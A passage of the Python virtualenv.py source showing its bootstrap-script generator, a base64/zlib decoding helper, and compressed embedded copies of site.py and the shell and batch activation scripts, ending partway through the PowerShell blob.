    while target_parts and base_parts and target_parts[0] == base_parts[0]:
        target_parts.pop(0)
        base_parts.pop(0)
    # Climb out of what's left of base, then descend into the target.
    parts = ['..'] * len(base_parts) + target_parts
    if target_filename is not None:
        parts.append(target_filename)
    if not parts:
        # Special case for the current directory (otherwise it'd be '')
        return './'
    return os.path.sep.join(parts)
############################################################
## Bootstrap script creation:
def create_bootstrap_script(extra_text, python_version=''):
    """
    Creates a bootstrap script, which is like this script but with
    extend_parser, adjust_options, and after_install hooks.

    This returns a string that (written to disk of course) can be used
    as a bootstrap script with your own customizations.  The script
    will be the standard virtualenv.py script, with your extra text
    added (your extra text should be Python code).

    If you include these functions, they will be called:

    ``extend_parser(optparse_parser)``:
        You can add or remove options from the parser here.

    ``adjust_options(options, args)``:
        You can change options here, or change the args (if you accept
        different kinds of arguments, be sure you modify ``args`` so it is
        only ``[DEST_DIR]``).

    ``after_install(options, home_dir)``:
        After everything is installed, this function is called.  This is
        probably the function you are most likely to use; for example it
        can immediately install a package and run a setup script from it.

    If you provide something like ``python_version='2.5'`` then the
    script will start with ``#!/usr/bin/env python2.5`` instead of
    ``#!/usr/bin/env python``.  You can use this when the script must
    be run with a particular Python version.
    """
    src = __file__
    if src.endswith('.pyc'):
        src = src[:-1]
    f = codecs.open(src, 'r', encoding='utf-8')
    try:
        content = f.read()
    finally:
        f.close()
    header = '#!/usr/bin/env python%s\n' % python_version
    content = header + '## WARNING: This file is generated\n' + content
    # The marker is spelled as two adjacent literals so that this very
    # function's own source survives the substitution when the script
    # processes itself.
    return content.replace('##EXT' 'END##', extra_text)
##EXTEND##
def convert(s):
    """Decode a base64-encoded, zlib-compressed blob back into text.

    ``s`` is an ASCII base64 string; the decompressed bytes are decoded
    as UTF-8 and returned as a string.
    """
    compressed = base64.b64decode(s.encode('ascii'))
    return zlib.decompress(compressed).decode('utf-8')
##file site.py
SITE_PY = convert("""
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
AVijEPwfucjncQ==
""")
##file activate.sh
ACTIVATE_SH = convert("""
eJytVVFv2jAQfs+vuIY+lGo0Yo+tmEQ1JJBaqBrWaWurYJKDWAo2ShxSWvW/7+yEEAhl0tY8EOI7
332++75zA8YhT2DGI4RFmiiYIqQJBpBxFYKdyDT2EaZcOMxXfMUU2nA+i+UCpiwJz60GrGUKPhNC
KohTAVxBwGP0VbS2rAA3u+CsCW8W0JOKBBUs14H0LbPQgBj1kowCQLHisRQLFApWLOZsGmFivPgM
HqElwD5980Y3372Hwf34R/fGu+uO+613G57hClSIwjjrRxs69mnN2S498GUpY2Ucy7UcXW2Tsc/4
cSS/xv3RsD+67R3GU5prqEpLHVtpOopw14twFoU1vU1CmVJpA1TUFdM2YCKA1yT8AlnI/RBCtkJg
9CKTLxcLbVYhU4YRRSjihc+iiJihJMwJATWa/s1krD+WjKhTbE0uAH4Se2SqCrPiYl6E2XHUBYJT
XV/wQybmmEBGNGSB/lmDphSlJXYsCTkG+9W/7rqm9S1ZLPx2+95D794djIYHW2AO2Irh6zcnwJUj
0ijaKdiHnXXbh1vqtmu9dNv1Jrrto90rzBsUucvG2hs+bLGdaGgGSwdsIUWAiYpTLTHcg9cAF6MZ
bBxO9gC0tGmjzU32d4vknNt5HGOEK7Yjw4qad3NbVgVtx/a8yqfn2VZRh+qRrJrEqJK5PIuPirfj
edeDoTfs3vY877Jwq6q3xL1Vgi4YrZBFaRFkPIpgxnik16teifbSTNZcxMVSrYHORYSFs1wc5DFl
AUlmnbF1k+L5Rk40JGFCsc5MOdMruCQml3GbcDUBLozarAqtjsyIDxSty7I3H/aPamnm5EledZJq
9b8P3O71Tc+7ux/d3o3/ktTQuWSwiWi/bLuZx6CGwkkHXj6QQ919GxGjBCuhJ1QdFGyB8LTT7id7
YgiuM9WSNEBPA84iGkfUAhow0KUVQRNjzv3i7pExL66NYgsihEotLx0ny7KLV1Q0Y1YXNIecRM5U
xmJ0mI7i7B7msQJxQqEPgn2aTJ7hwCHLKGdHDtrcbiyul+JVmR26vSziLMlvzY69XNN0FdBa5Au2
5v+njPpPGPP/OeL/dbwfGu1Utz87Sp7q
""")
##file activate.fish
ACTIVATE_FISH = convert("""
eJydVW2P2jgQ/s6vmAZQoVpA9/WkqqJaTou0u6x2uZVOVWWZZEKsS+yc7UDpr+84bziQbauLxEvs
eXnsZ56ZIWwTYSAWKUJWGAs7hMJgBEdhEwiMKnSIsBNywUMrDtziPBYmCeBDrFUG7v8HmCTW5n8u
Fu7NJJim81Bl08EQTqqAkEupLOhCgrAQCY2hTU+DQVxIiqgkRNiEBphFEKy+kd1BaFvwFOUBuIxA
oy20BKtAKp3xFMo0QNtCK5mhtMEA6BmSpUELKo38TThwLfguRVNaiRgs0llnEoIR29zfstf18/bv
5T17Wm7vAiiN3ONCzfbfwC3DtWXXDqHfAGX0q6z/bO82j3ebh1VwnbrduwTQbvwcRtesAfMGor/W
L3fs6Xnz8LRlm9fV8/P61sM0LDNwCZjl9gSpCokJRzpryGQ5t8kNGFUt51QjOZGu0Mj35FlYlXEr
yC09EVOp4lEXfF84Lz1qbhBsgl59vDedXI3rTV03xipduSgt9kLytI3XmBp3aV6MPoMQGNUU62T6
uQdeefTy1Hfj10zVHg2pq8fXDoHBiOv94csfXwN49xECqWREy7pwukKfvxdMY2j23vXDPuuxxeE+
JOdCOhxCE3N44B1ZeSLuZh8Mmkr2wEPAmPfKWHA2uxIRjEopdbQYjDz3BWOf14/scfmwoki1eQvX
ExBdF60Mqh+Y/QcX4uiH4Amwzx79KOVFtbL63sXJbtcvy8/3q5rupmO5CnE91wBviQAhjUUegYpL
vVEbpLt2/W+PklRgq5Ku6mp+rpMhhCo/lXthQTxJ2ysO4Ka0ad97S7VT/n6YXus6fzk3fLnBZW5C
KDC6gSO62QDqgFqLCCtPmjegjnLeAdArtSE8VYGbAJ/aLb+vnQutFhk768E9uRbSxhCMzdgEveYw
IZ5ZqFKl6+kz7UR4U+buqQZXu9SIujrAfD7f0FXpozB4Q0gwp31H9mVTZGGC4b871/wm7lvyDLu1
FUyvTj/yvD66k3UPTs08x1AQQaGziOl0S1qRkPG9COtBTSTWM9NzQ4R64B+Px/l3tDzCgxv5C6Ni
e+QaF9xFWrxx0V/G5uvYQOdiZzvYpQUVQSIsTr1TTghI33GnPbTA7/GCqcE3oE3GZurq4HeQXQD6
32XS1ITj/qLjN72ob0hc5C9bzw8MhfmL
""")
##file activate.csh
ACTIVATE_CSH = convert("""
eJx9VG1P2zAQ/u5fcYQKNgTNPtN1WxlIQ4KCUEGaxuQ6yYVYSuzKdhqVX7+zk3bpy5YPUXL3PPfc
ne98DLNCWshliVDV1kGCUFvMoJGugMjq2qQIiVSxSJ1cCofD1BYRnOVGV0CfZ0N2DD91DalQSjsw
tQLpIJMGU1euvPe7QeJlkKzgWixlhnAt4aoUVsLnLBiy5NtbJWQ5THX1ZciYKKWwkOFaE04dUm6D
r/zh7pq/3D7Nnid3/HEy+wFHY/gEJydg0aFaQrBFgz1c5DG1IhTs+UZgsBC2GMFBlaeH+8dZXwcW
VPvCjXdlAvCfQsE7al0+07XjZvrSCUevR5dnkVeKlFYZmUztG4BdzL2u9KyLVabTU0bdfg7a0hgs
cSmUg6UwUiQl2iHrcbcVGNvPCiLOe7+cRwG13z9qRGgx2z6DHjfm/Op2yqeT+xvOLzs0PTKHDz2V
tkckFHoQfQRXoGJAj9el0FyJCmEMhzgMS4sB7KPOE2ExoLcSieYwDvR+cP8cg11gKkVJc2wRcm1g
QhYFlXiTaTfO2ki0fQoiFM4tLuO4aZrhOzqR4dIPcWx17hphMBY+Srwh7RTyN83XOWkcSPh1Pg/k
TXX/jbJTbMtUmcxZ+/bbqOsy82suFQg/BhdSOTRhMNBHlUarCpU7JzBhmkKmRejKOQzayQe6MWoa
n1wqWmuh6LZAaHxcdeqIlVLhIBJdO9/kbl0It2oEXQj+eGjJOuvOIR/YGRqvFhttUB2XTvLXYN2H
37CBdbW2W7j2r2+VsCn0doVWcFG1/4y1VwBjfwAyoZhD
""")
##file activate.bat
ACTIVATE_BAT = convert("""
eJx9UdEKgjAUfW6wfxjiIH+hEDKUFHSKLCMI7kNOEkIf9P9pTJ3OLJ/03HPPPed4Es9XS9qqwqgT
PbGKKOdXL4aAFS7A4gvAwgijuiKlqOpGlATS2NeMLE+TjJM9RkQ+SmqAXLrBo1LLIeLdiWlD6jZt
r7VNubWkndkXaxg5GO3UaOOKS6drO3luDDiO5my3iA0YAKGzPRV1ack8cOdhysI0CYzIPzjSiH5X
0QcvC8Lfaj0emsVKYF2rhL5L3fCkVjV76kShi59NHwDniAHzkgDgqBcwOgTMx+gDQQqXCw==
""")
##file deactivate.bat
DEACTIVATE_BAT = convert("""
eJxzSE3OyFfIT0vj4ipOLVEI8wwKCXX0iXf1C7Pl4spMU0hJTcvMS01RiPf3cYmHyQYE+fsGhCho
cCkAAUibEkTEVhWLMlUlLk6QGixStlyaeCyJDPHw9/Pw93VFsQguim4ZXAJoIUw5DhX47XUM8UCx
EchHtwsohN1bILUgw61c/Vy4AJYPYm4=
""")
##file activate.ps1
ACTIVATE_PS = convert("""
eJylWdmO41hyfW+g/0FTU7C7IXeJIqmtB/3AnZRIStxF2kaBm7gv4ipyMF/mB3+Sf8GXVGVl1tLT
43ECSqR4b5wbETeWE8z/+a///vNCDaN6cYtSf5G1dbNw/IVXNIu6aCvX9xa3qsgWl0IJ/7IYinbh
